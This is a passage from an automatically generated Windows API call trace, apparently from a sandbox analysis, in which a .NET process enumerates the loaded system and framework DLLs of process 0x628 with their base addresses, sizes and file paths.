lpmodinfo=0x239eb58, cb=0xc | out: lpmodinfo=0x239eb58*(lpBaseOfDll=0x73f00000, SizeOfImage=0x1e000, EntryPoint=0x73f0b640)) returned 1 [0140.999] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0140.999] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x73f00000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0140.999] CoTaskMemFree (pv=0x558e10) [0140.999] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0140.999] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x73f00000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0141.000] CoTaskMemFree (pv=0x558e10) [0141.000] GetModuleInformation (in: hProcess=0x628, hModule=0x73ef0000, lpmodinfo=0x23a0c64, cb=0xc | out: lpmodinfo=0x23a0c64*(lpBaseOfDll=0x73ef0000, SizeOfImage=0xa000, EntryPoint=0x73ef2a00)) returned 1 [0141.000] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.000] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x73ef0000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0141.001] CoTaskMemFree (pv=0x558e10) [0141.001] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.001] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x73ef0000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0141.002] CoTaskMemFree (pv=0x558e10) [0141.002] GetModuleInformation (in: hProcess=0x628, hModule=0x76840000, lpmodinfo=0x23a2d78, cb=0xc | out: lpmodinfo=0x23a2d78*(lpBaseOfDll=0x76840000, SizeOfImage=0x58000, EntryPoint=0x768825c0)) returned 1 [0141.002] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.002] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x76840000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0141.002] CoTaskMemFree (pv=0x558e10) [0141.003] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.003] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x76840000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0141.003] CoTaskMemFree (pv=0x558e10) [0141.003] GetModuleInformation (in: hProcess=0x628, hModule=0x6c430000, lpmodinfo=0x23a4eac, cb=0xc | out: lpmodinfo=0x23a4eac*(lpBaseOfDll=0x6c430000, SizeOfImage=0x7d000, EntryPoint=0x6c440db0)) returned 1 [0141.003] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.003] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x6c430000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0141.004] CoTaskMemFree (pv=0x558e10) [0141.004] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.004] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x6c430000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0141.004] CoTaskMemFree (pv=0x558e10) [0141.004] GetModuleInformation (in: hProcess=0x628, hModule=0x76d00000, lpmodinfo=0x23a6ff4, cb=0xc | out: lpmodinfo=0x23a6ff4*(lpBaseOfDll=0x76d00000, SizeOfImage=0x45000, EntryPoint=0x76d1de90)) returned 1 [0141.005] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.005] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x76d00000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0141.005] CoTaskMemFree (pv=0x558e10) [0141.005] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.005] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x76d00000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0141.006] CoTaskMemFree (pv=0x558e10) [0141.006] GetModuleInformation (in: hProcess=0x628, hModule=0x762b0000, lpmodinfo=0x23a9100, cb=0xc | out: lpmodinfo=0x23a9100*(lpBaseOfDll=0x762b0000, SizeOfImage=0x1bd000, EntryPoint=0x76392a10)) returned 1 [0141.006] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.006] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x762b0000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0141.007] CoTaskMemFree (pv=0x558e10) [0141.007] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.007] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x762b0000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0141.007] CoTaskMemFree (pv=0x558e10) [0141.007] GetModuleInformation (in: hProcess=0x628, hModule=0x74ab0000, lpmodinfo=0x23ab20c, cb=0xc | out: lpmodinfo=0x23ab20c*(lpBaseOfDll=0x74ab0000, SizeOfImage=0x14f000, EntryPoint=0x74b66820)) returned 1 [0141.007] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.007] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x74ab0000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0141.008] CoTaskMemFree (pv=0x558e10) [0141.008] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.008] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x74ab0000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0141.008] CoTaskMemFree (pv=0x558e10) [0141.009] GetModuleInformation (in: hProcess=0x628, hModule=0x743d0000, lpmodinfo=0x23ad39c, cb=0xc | out: lpmodinfo=0x23ad39c*(lpBaseOfDll=0x743d0000, SizeOfImage=0x147000, EntryPoint=0x743e1cf0)) returned 1 [0141.009] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.009] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x743d0000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0141.013] CoTaskMemFree (pv=0x558e10) [0141.013] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.013] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x743d0000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0141.014] CoTaskMemFree (pv=0x558e10) [0141.014] GetModuleInformation (in: hProcess=0x628, hModule=0x741b0000, lpmodinfo=0x23af4a8, cb=0xc | out: lpmodinfo=0x23af4a8*(lpBaseOfDll=0x741b0000, SizeOfImage=0x2b000, EntryPoint=0x741b5680)) returned 1 [0141.014] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.014] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x741b0000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0141.015] CoTaskMemFree (pv=0x558e10) [0141.015] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.015] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x741b0000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0141.015] CoTaskMemFree (pv=0x558e10) [0141.015] GetModuleInformation (in: hProcess=0x628, hModule=0x76d50000, lpmodinfo=0x23b15ac, cb=0xc | out: lpmodinfo=0x23b15ac*(lpBaseOfDll=0x76d50000, SizeOfImage=0xc000, EntryPoint=0x76d53930)) returned 1 [0141.016] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.016] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x76d50000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0141.017] CoTaskMemFree (pv=0x558e10) [0141.017] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.017] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x76d50000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0141.017] CoTaskMemFree (pv=0x558e10) [0141.017] GetModuleInformation (in: hProcess=0x628, hModule=0x6f840000, lpmodinfo=0x23b36d8, cb=0xc | out: lpmodinfo=0x23b36d8*(lpBaseOfDll=0x6f840000, SizeOfImage=0x8000, EntryPoint=0x6f8417b0)) returned 1 [0141.018] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.018] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x6f840000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0141.018] CoTaskMemFree (pv=0x558e10) [0141.018] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.019] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x6f840000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0141.019] CoTaskMemFree (pv=0x558e10) [0141.019] GetModuleInformation (in: hProcess=0x628, hModule=0x69370000, lpmodinfo=0x23b57e4, cb=0xc | out: lpmodinfo=0x23b57e4*(lpBaseOfDll=0x69370000, SizeOfImage=0x6e1000, EntryPoint=0x6939cd70)) returned 1 [0141.020] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.020] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x69370000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0141.020] CoTaskMemFree (pv=0x558e10) [0141.020] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.020] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x69370000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0141.021] CoTaskMemFree (pv=0x558e10) [0141.021] GetModuleInformation (in: hProcess=0x628, hModule=0x6a880000, lpmodinfo=0x23b7914, cb=0xc | out: lpmodinfo=0x23b7914*(lpBaseOfDll=0x6a880000, SizeOfImage=0xf5000, EntryPoint=0x6a8d4160)) returned 1 [0141.021] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.021] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x6a880000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0141.022] CoTaskMemFree (pv=0x558e10) [0141.022] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.022] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x6a880000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0141.023] CoTaskMemFree (pv=0x558e10) [0141.023] GetModuleInformation (in: hProcess=0x628, hModule=0x680b0000, lpmodinfo=0x23b9a48, cb=0xc | out: lpmodinfo=0x23b9a48*(lpBaseOfDll=0x680b0000, SizeOfImage=0x12b2000, EntryPoint=0x0)) returned 1 [0141.023] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.023] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x680b0000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0141.024] CoTaskMemFree (pv=0x558e10) [0141.024] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.024] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x680b0000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll")) returned 0x68 [0141.025] CoTaskMemFree (pv=0x558e10) [0141.025] GetModuleInformation (in: hProcess=0x628, hModule=0x74dc0000, lpmodinfo=0x23bbbf0, cb=0xc | out: lpmodinfo=0x23bbbf0*(lpBaseOfDll=0x74dc0000, SizeOfImage=0xeb000, EntryPoint=0x74dfd650)) returned 1 [0141.028] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.028] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x74dc0000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0141.028] CoTaskMemFree (pv=0x558e10) [0141.028] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.028] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x74dc0000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0141.029] CoTaskMemFree (pv=0x558e10) [0141.029] GetModuleInformation (in: hProcess=0x628, hModule=0x73dd0000, lpmodinfo=0x23bdcf4, cb=0xc | out: lpmodinfo=0x23bdcf4*(lpBaseOfDll=0x73dd0000, SizeOfImage=0x75000, EntryPoint=0x73e09a60)) returned 1 [0141.030] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.030] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x73dd0000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="uxtheme.dll") returned 0xb [0141.030] CoTaskMemFree (pv=0x558e10) [0141.030] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.030] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x73dd0000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")) returned 0x1f [0141.031] CoTaskMemFree (pv=0x558e10) [0141.031] GetModuleInformation (in: hProcess=0x628, hModule=0x69e40000, lpmodinfo=0x23bfe00, cb=0xc | out: lpmodinfo=0x23bfe00*(lpBaseOfDll=0x69e40000, SizeOfImage=0x80000, EntryPoint=0x69e41180)) returned 1 [0141.032] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.032] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x69e40000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0141.032] CoTaskMemFree (pv=0x558e10) [0141.032] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.032] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x69e40000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0141.033] CoTaskMemFree (pv=0x558e10) [0141.033] GetModuleInformation (in: hProcess=0x628, hModule=0x76680000, lpmodinfo=0x23c1f40, cb=0xc | out: lpmodinfo=0x23c1f40*(lpBaseOfDll=0x76680000, SizeOfImage=0x92000, EntryPoint=0x766b8cf0)) returned 1 [0141.034] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.034] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x76680000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0141.035] CoTaskMemFree (pv=0x558e10) [0141.035] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.035] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x76680000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0141.035] CoTaskMemFree (pv=0x558e10) [0141.035] GetModuleInformation (in: hProcess=0x628, hModule=0x676e0000, lpmodinfo=0x23c4054, cb=0xc | out: lpmodinfo=0x23c4054*(lpBaseOfDll=0x676e0000, SizeOfImage=0x9cc000, EntryPoint=0x0)) returned 1 [0141.036] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.036] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x676e0000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0141.037] CoTaskMemFree (pv=0x558e10) [0141.037] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.037] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x676e0000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll")) returned 0x64 [0141.037] CoTaskMemFree (pv=0x558e10) [0141.038] GetModuleInformation (in: hProcess=0x628, hModule=0x69c40000, lpmodinfo=0x23c61f0, cb=0xc | out: lpmodinfo=0x23c61f0*(lpBaseOfDll=0x69c40000, SizeOfImage=0x18f000, EntryPoint=0x0)) returned 1 [0141.038] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.038] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x69c40000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="System.Drawing.ni.dll") returned 0x15 [0141.039] CoTaskMemFree (pv=0x558e10) [0141.039] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.039] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x69c40000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\system.drawing.ni.dll")) returned 0x74 [0141.040] CoTaskMemFree (pv=0x558e10) [0141.040] GetModuleInformation (in: hProcess=0x628, hModule=0x66a70000, lpmodinfo=0x23c83bc, cb=0xc | out: lpmodinfo=0x23c83bc*(lpBaseOfDll=0x66a70000, SizeOfImage=0xc67000, EntryPoint=0x0)) returned 1 [0141.040] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.040] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x66a70000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="System.Windows.Forms.ni.dll") returned 0x1b [0141.045] CoTaskMemFree (pv=0x558e10) [0141.045] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.045] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x66a70000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\system.windows.forms.ni.dll")) returned 0x80 [0141.046] CoTaskMemFree (pv=0x558e10) [0141.046] GetModuleInformation (in: hProcess=0x628, hModule=0x6b4d0000, lpmodinfo=0x23ca5ac, cb=0xc | out: lpmodinfo=0x23ca5ac*(lpBaseOfDll=0x6b4d0000, SizeOfImage=0x92000, EntryPoint=0x6b4ddd60)) returned 1 [0141.047] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.047] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x6b4d0000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0141.048] CoTaskMemFree (pv=0x558e10) [0141.048] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.048] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x6b4d0000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")) returned 0x78 [0141.048] CoTaskMemFree (pv=0x558e10) [0141.048] GetModuleInformation (in: hProcess=0x628, hModule=0x72d30000, lpmodinfo=0x23cc770, cb=0xc | out: lpmodinfo=0x23cc770*(lpBaseOfDll=0x72d30000, SizeOfImage=0x20f000, EntryPoint=0x72ddb0a0)) returned 1 [0141.049] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.049] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x72d30000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0141.050] CoTaskMemFree (pv=0x558e10) [0141.050] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.050] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x72d30000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll")) returned 0x77 [0141.051] CoTaskMemFree (pv=0x558e10) [0141.051] GetModuleInformation (in: hProcess=0x628, hModule=0x73db0000, lpmodinfo=0x23cea3c, cb=0xc | out: lpmodinfo=0x23cea3c*(lpBaseOfDll=0x73db0000, SizeOfImage=0x1d000, EntryPoint=0x73db3b10)) returned 1 [0141.052] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.052] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x73db0000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0141.053] CoTaskMemFree (pv=0x558e10) [0141.053] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.053] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x73db0000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")) returned 0x1e [0141.053] CoTaskMemFree (pv=0x558e10) [0141.053] GetModuleInformation (in: hProcess=0x628, hModule=0x66320000, lpmodinfo=0x23d0b48, cb=0xc | out: lpmodinfo=0x23d0b48*(lpBaseOfDll=0x66320000, SizeOfImage=0x721000, EntryPoint=0x0)) returned 1 [0141.054] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.054] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x66320000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0141.055] CoTaskMemFree (pv=0x558e10) [0141.056] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.056] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x66320000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll")) returned 0x6e [0141.062] CoTaskMemFree (pv=0x558e10) [0141.063] GetModuleInformation (in: hProcess=0x628, hModule=0x66220000, lpmodinfo=0x23d2d04, cb=0xc | out: lpmodinfo=0x23d2d04*(lpBaseOfDll=0x66220000, SizeOfImage=0xf1000, EntryPoint=0x0)) returned 1 [0141.063] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.063] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x66220000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="System.Configuration.ni.dll") returned 0x1b [0141.064] CoTaskMemFree (pv=0x558e10) [0141.064] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.064] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x66220000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\fe4b221b4109f0c78f57a792500699b5\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\fe4b221b4109f0c78f57a792500699b5\\system.configuration.ni.dll")) returned 0x80 [0141.065] CoTaskMemFree (pv=0x558e10) [0141.065] GetModuleInformation (in: hProcess=0x628, hModule=0x65b00000, lpmodinfo=0x23d4ef4, cb=0xc | out: lpmodinfo=0x23d4ef4*(lpBaseOfDll=0x65b00000, SizeOfImage=0x71e000, EntryPoint=0x0)) returned 1 [0141.066] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.066] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x65b00000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="System.Xml.ni.dll") returned 0x11 [0141.067] CoTaskMemFree (pv=0x558e10) [0141.067] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.067] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x65b00000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\4fbda26d781323081b45526da6e87b35\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\4fbda26d781323081b45526da6e87b35\\system.xml.ni.dll")) returned 0x6c [0141.068] CoTaskMemFree (pv=0x558e10) [0141.068] GetModuleInformation (in: hProcess=0x628, hModule=0x764d0000, lpmodinfo=0x23d70a8, cb=0xc | out: lpmodinfo=0x23d70a8*(lpBaseOfDll=0x764d0000, SizeOfImage=0x6000, EntryPoint=0x764d1460)) returned 1 [0141.069] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.069] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x764d0000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0141.070] CoTaskMemFree (pv=0x558e10) [0141.070] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.070] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x764d0000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0141.071] CoTaskMemFree (pv=0x558e10) [0141.071] GetModuleInformation (in: hProcess=0x628, hModule=0x65a50000, lpmodinfo=0x23d91ac, cb=0xc | out: lpmodinfo=0x23d91ac*(lpBaseOfDll=0x65a50000, SizeOfImage=0xa5000, EntryPoint=0x65a6ac50)) returned 1 [0141.075] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.075] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x65a50000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="rasapi32.dll") returned 0xc [0141.076] CoTaskMemFree (pv=0x558e10) [0141.076] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.076] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x65a50000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll")) returned 0x20 [0141.077] CoTaskMemFree (pv=0x558e10) [0141.077] GetModuleInformation (in: hProcess=0x628, hModule=0x65a20000, lpmodinfo=0x23db2c0, cb=0xc | out: lpmodinfo=0x23db2c0*(lpBaseOfDll=0x65a20000, SizeOfImage=0x23000, EntryPoint=0x65a25570)) returned 1 [0141.078] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.078] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x65a20000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="rasman.dll") returned 0xa [0141.079] CoTaskMemFree (pv=0x558e10) [0141.079] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.079] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x65a20000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll")) returned 0x1e [0141.080] CoTaskMemFree (pv=0x558e10) [0141.080] GetModuleInformation (in: hProcess=0x628, hModule=0x65a10000, lpmodinfo=0x23dd3cc, 